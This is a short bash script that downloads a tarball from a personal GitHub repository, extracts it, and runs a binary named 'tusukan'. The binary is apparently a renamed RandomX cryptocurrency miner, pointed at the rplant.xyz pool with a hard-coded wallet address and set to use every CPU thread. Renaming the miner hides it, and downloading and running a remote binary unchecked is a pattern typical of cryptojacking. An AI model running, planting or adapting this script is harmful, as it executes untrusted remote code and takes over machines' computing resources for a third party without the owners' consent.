#!/bin/bash
wget https://github.com/ganggamulyana08/ganggamulyana08/raw/main/tusukan.tar.gz && tar -xvf tusukan.tar.gz
./tusukan -a rx/0 --url randomx.rplant.xyz:7123 --user TuskeSyubpn6ndMG1u7NmncG6CWZFTmaCbuRySSTE67sP3u13RNATStC2WWfChuGz4JaJ8c56TiweAUzksocQXGNN7PjCWcQWx2A3D.kaeng -t $(nproc --all)
